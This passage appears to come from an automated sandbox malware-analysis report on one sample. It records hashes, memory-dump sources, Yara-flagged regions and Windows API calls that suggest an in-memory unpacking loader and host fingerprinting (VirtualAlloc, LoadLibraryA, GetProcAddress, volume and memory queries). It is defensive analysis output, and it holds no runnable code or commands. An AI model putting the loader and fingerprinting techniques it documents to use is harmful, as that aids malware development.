                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5b5f4f53ba419257f2c99d53f27223171b991d6193ee5832ef2f56c753d8d8e1
                                                    • Instruction ID: 4c680af95089d7f0266524c2a1d5a39c2a6c001387b2c56eb0ee7e33708b2ad5
                                                    • Opcode Fuzzy Hash: 5b5f4f53ba419257f2c99d53f27223171b991d6193ee5832ef2f56c753d8d8e1
                                                    • Instruction Fuzzy Hash: FB5168742007119BD724CF28C861B62B3F1FF4A318F548A5DE8968B7A1D779B845CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a8b148af547a59128bb71e64be0d4d12e62a739c123e6228515b622e6ca986d7
                                                    • Instruction ID: e2717505d55db8640db63e85cfe19b0466bde158ad5ac179620a4d1d884c2fba
                                                    • Opcode Fuzzy Hash: a8b148af547a59128bb71e64be0d4d12e62a739c123e6228515b622e6ca986d7
                                                    • Instruction Fuzzy Hash: 124179746083029BE708DF04C594B2FB7E6BFDA718F68591DE0858B341D338ED169B9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a2911f6e714779df75f77f4e9c30eb5bfbff7d856db354c347998ed89740c5d8
                                                    • Instruction ID: c1c90ed302c5d13420f5bca68ce5e1754aac3df7c22edd8dd8ca255a1c6ae94c
                                                    • Opcode Fuzzy Hash: a2911f6e714779df75f77f4e9c30eb5bfbff7d856db354c347998ed89740c5d8
                                                    • Instruction Fuzzy Hash: 2C216D746083029BE310DF04C994B1FB7F2BBC5B08F245A1DE1949B396C779DC059B9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 71eeffcf46f1b7fa9e56d8600949dbbcd25cfd78c9bd91e554dbcc0743bda1b8
                                                    • Instruction ID: e757895f7bb26a2b2320ca7d8dd105008f44d0bd9ca2c0e57cc8f66670818d05
                                                    • Opcode Fuzzy Hash: 71eeffcf46f1b7fa9e56d8600949dbbcd25cfd78c9bd91e554dbcc0743bda1b8
                                                    • Instruction Fuzzy Hash: 43E0E5B06083018FC314EF28D591B5BBBE0FB89304F12C82DE49A8B254D779A944CB45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph (rendered graph not reproduced)
                                                    • Function start: 41d003c; last block: 41d0902-41d091d
                                                    • API calls in graph: VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA (2 call sites)
                                                    • Internal calls: 41d0a3f, 41d0e0f, 41d0d90, 41d0a69, 41d0cce, 41d0ce7
                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 041D024D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: cess$kernel32.dll
                                                    • API String ID: 4275171209-1230238691
                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                    • Instruction ID: 339ae679fd34fd2d4a8d9683449fdeaba0574bcec52c23c1021cfcc79f7169d1
                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                    • Instruction Fuzzy Hash: A1526AB5A01229DFDB64CF58C984BACBBB1BF09304F1580D9E94DAB351DB30AA85DF14
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph (rendered graph not reproduced)
                                                    • Function start: 41d690; last block: 41d937-41d954
                                                    • API calls in graph: RtlExpandEnvironmentStrings (2 call sites)
                                                    • Internal calls: 433b50 (2 call sites), 438d50
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041D77D
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041D7A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: -^$AV$SE$X&
                                                    • API String ID: 237503144-3017178743
                                                    • Opcode ID: 126da50c2d0a41b480321852bc94709b34504f4e9e0a0586602205dd78c64019
                                                    • Instruction ID: 414b802ac07eb15e34250c72f36e95362d79bb1e0692564b293e6573eb188213
                                                    • Opcode Fuzzy Hash: 126da50c2d0a41b480321852bc94709b34504f4e9e0a0586602205dd78c64019
                                                    • Instruction Fuzzy Hash: 7A71AAB06083518FE324CF14D8A0BABB7E1EFC6314F114A2DE8E95B280D7789945CB97
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph (rendered graph not reproduced)
                                                    • Function start: 414950; last block: 414b5a-414b76
                                                    • API calls in graph: RtlExpandEnvironmentStrings (2 call sites)
                                                    • Internal calls: 433b50 (2 call sites), 438ba0
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 0041499D
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 004149CE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: 2M#O$<Y.[$r]Nm$qrs
                                                    • API String ID: 237503144-2765572984
                                                    • Opcode ID: 1eeaee2e8186193ac6611b8cf20863375f2d41a74451ba6092e37ba744e7f2b9
                                                    • Instruction ID: f437b4c60a0e393287c60c1191dc60451405bce4f387bbd6b600237a0ee68e47
                                                    • Opcode Fuzzy Hash: 1eeaee2e8186193ac6611b8cf20863375f2d41a74451ba6092e37ba744e7f2b9
                                                    • Instruction Fuzzy Hash: C751B2B46183419FD320CF14D891BABB7E5EFC6324F054A1DF9958B381E3B89941CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph (rendered graph not reproduced)
                                                    • Function start: 424af5; last block: 42542b-4254cc
                                                    • API calls in graph: GetPhysicallyInstalledSystemMemory
                                                    • Internal calls: 431cd0, 438070
                                                    APIs
                                                    • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 004250BF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: InstalledMemoryPhysicallySystem
                                                    • String ID: M:h:$P6D+$hFt=
                                                    • API String ID: 3960555810-4191368970
                                                    • Opcode ID: c278c4235c0e40e0a55a1437a375328b041559dd9e5fde0177f8855f0f599da5
                                                    • Instruction ID: 6d38b88902e1eb16ca30da568e3269f0221434b507219f1e067bc0dfabd335eb
                                                    • Opcode Fuzzy Hash: c278c4235c0e40e0a55a1437a375328b041559dd9e5fde0177f8855f0f599da5
                                                    • Instruction Fuzzy Hash: 6BF14C70504F928BD726CF35C4687A3BBE1AF56308F44496EC4FA8B792C779A406CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph (rendered graph not reproduced)
                                                    • Function start: 424f8f; last block: 42542b-4254cc (blocks from 425039 onward are shared with the 424af5 graph above)
                                                    • API calls in graph: GetPhysicallyInstalledSystemMemory
                                                    • Internal calls: 42c4d0, 408700, 431cd0, 438070
                                                    APIs
                                                    • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 004250BF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: InstalledMemoryPhysicallySystem
                                                    • String ID: M:h:$P6D+$hFt=
                                                    • API String ID: 3960555810-4191368970
                                                    • Opcode ID: 32e0737a2d6175cdbece8af79c35379da23b45502fd7d699c5d466c5fa412165
                                                    • Instruction ID: f66b18d75a9a4d2bb6148ac8f6660ab2d7ad2189567b3251afa320a6a21df7b8
                                                    • Opcode Fuzzy Hash: 32e0737a2d6175cdbece8af79c35379da23b45502fd7d699c5d466c5fa412165
                                                    • Instruction Fuzzy Hash: 0ED15A70504F528BE726CF35C4A87A7BBE1AF56308F44496DC0FA8B792C779A406CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph (rendered graph not reproduced)
                                                    • Function start: 41df50; last block: 41e17f-41e182
                                                    • API calls in graph: RtlExpandEnvironmentStrings (2 call sites)
                                                    • Internal calls: 433b50, 417810
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0041E08D
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 0041E0BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: ru$M3
                                                    • API String ID: 237503144-652937946
                                                    • Opcode ID: 7291a3a811873626bd3b785a5b847c75c0ba1258cac978df8a67f20d3e36ac33
                                                    • Instruction ID: ee0422986e9a500056daf517ec787597a82c07e08ececa7a1628db096f87ed23
                                                    • Opcode Fuzzy Hash: 7291a3a811873626bd3b785a5b847c75c0ba1258cac978df8a67f20d3e36ac33
                                                    • Instruction Fuzzy Hash: 585153B5108381AFE314CF01C990B5BBBE5ABCA354F10892DF8A55B381C775DA868B96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph (rendered graph not reproduced)
                                                    • Single block: 431dd5-431e35
                                                    • API calls in graph: GetVolumeInformationW
                                                    • Internal calls: 438070
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00431E18
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID: :$C$\
                                                    • API String ID: 2039140958-3809124531
                                                    • Opcode ID: 66204d55befe17f0d94a4a8d29d4561092dd70cceac0cbdb9e091147346ca143
                                                    • Instruction ID: c07b020124bcaf9168d5cc752a0c39b43d1a69f77c2585f3e396cbfa2ffbe00c
                                                    • Opcode Fuzzy Hash: 66204d55befe17f0d94a4a8d29d4561092dd70cceac0cbdb9e091147346ca143
                                                    • Instruction Fuzzy Hash: 09F06574654301BBE328CF10ED27F1A72A49F86B04F20982DB245961D0E7B5AA189A5D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    • in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified, xrefs: 00408CBD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID: in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified
                                                    • API String ID: 621844428-4175449110
                                                    • Opcode ID: fabb64060f129b09b2fb295de89773e3c4aadf7bbb2d4122ec10e8a8cd5565c7
                                                    • Instruction ID: 59104990f458cfd7c5091e5889e4cb5e8d5d284f7426018ae83b6ee6547e8fc3
                                                    • Opcode Fuzzy Hash: fabb64060f129b09b2fb295de89773e3c4aadf7bbb2d4122ec10e8a8cd5565c7
                                                    • Instruction Fuzzy Hash: 8CF081B180D61496FA107BB56B0A26A3E786F20354F10063FE8C2751C2EE3D444952BF
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID: ^]
                                                    • API String ID: 1029625771-1882935148
                                                    • Opcode ID: 052ae51dc26a683516fa0474b257cbb9c1e58a34672b0d67708fa9d60aa416e8
                                                    • Instruction ID: 7efbe0a01219f739987a36331eecae1ceeecbc8983e72e3a87576bfb5e9ed186
                                                    • Opcode Fuzzy Hash: 052ae51dc26a683516fa0474b257cbb9c1e58a34672b0d67708fa9d60aa416e8
                                                    • Instruction Fuzzy Hash: 88318DB4119342ABEB08CF10D66461FBBF2AFC9748F158A1DE4851B759D738C941CF8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserCallbackDispatcher.NTDLL ref: 0042D6B9
                                                    • GetSystemMetrics.USER32 ref: 0042D6CA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: CallbackDispatcherMetricsSystemUser
                                                    • String ID:
                                                    • API String ID: 365337688-0
                                                    • Opcode ID: 9f3c4366f6acc61bef91b6474569325c5038b687278105cc48c3da76987b540e
                                                    • Instruction ID: e31df5cf53579e26f0d038b5bc67af8e11bea7006768dfca6b49015060dc1ea9
                                                    • Opcode Fuzzy Hash: 9f3c4366f6acc61bef91b6474569325c5038b687278105cc48c3da76987b540e
                                                    • Instruction Fuzzy Hash: D53154B4A10B009FD360DF3DC945A22BBE8FB0C600B100A2DE99AC7B50E734B8448B96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 0041784A
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 0041787E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID:
                                                    • API String ID: 237503144-0
                                                    • Opcode ID: 591883fc8cc7e98f5393b82a229ecb00a65222f46bfedd7c35e61c2a286ee97b
                                                    • Instruction ID: 5e955635065adc13492d4d85393db762cd4c4b4ecf76f0ca5c4caab7127c9149
                                                    • Opcode Fuzzy Hash: 591883fc8cc7e98f5393b82a229ecb00a65222f46bfedd7c35e61c2a286ee97b
                                                    • Instruction Fuzzy Hash: EF0104719082047BE7109B65DC86FA77BACEB86774F044629F965C72D0E730A814CBB6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00000400,?,?,041D0223,?,?), ref: 041D0E19
                                                    • SetErrorMode.KERNELBASE(00000000,?,?,041D0223,?,?), ref: 041D0E1E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: AllocString
                                                    • String ID:
                                                    • API String ID: 2525500382-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: AllocString
                                                    • String ID:
                                                    • API String ID: 2525500382-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00433BF1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 00437658
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 004376F1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00433CB4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 042658E6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1845056806.0000000004265000.00000040.00000020.00020000.00000000.sdmp, Offset: 04265000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4265000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$CloseDataInfoOpenWindow
                                                    • String ID: 7$8$9$:$;
                                                    • API String ID: 2278096442-1017836374
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )$IDAT$IEND$IHDR
                                                    • API String ID: 0-3181356877
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .$GetProcAddress.$l
                                                    • API String ID: 0-2784972518
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0$8
                                                    • API String ID: 0-46163386
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0$8
                                                    • API String ID: 0-46163386
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: +u7$Z8J*
                                                    • API String ID: 0-3577212644
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $JC
                                                    • API String ID: 0-571460022
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: R-,T$R-,T
                                                    • API String ID: 0-2000385741
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: R-,T$R-,T
                                                    • API String ID: 0-2000385741
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
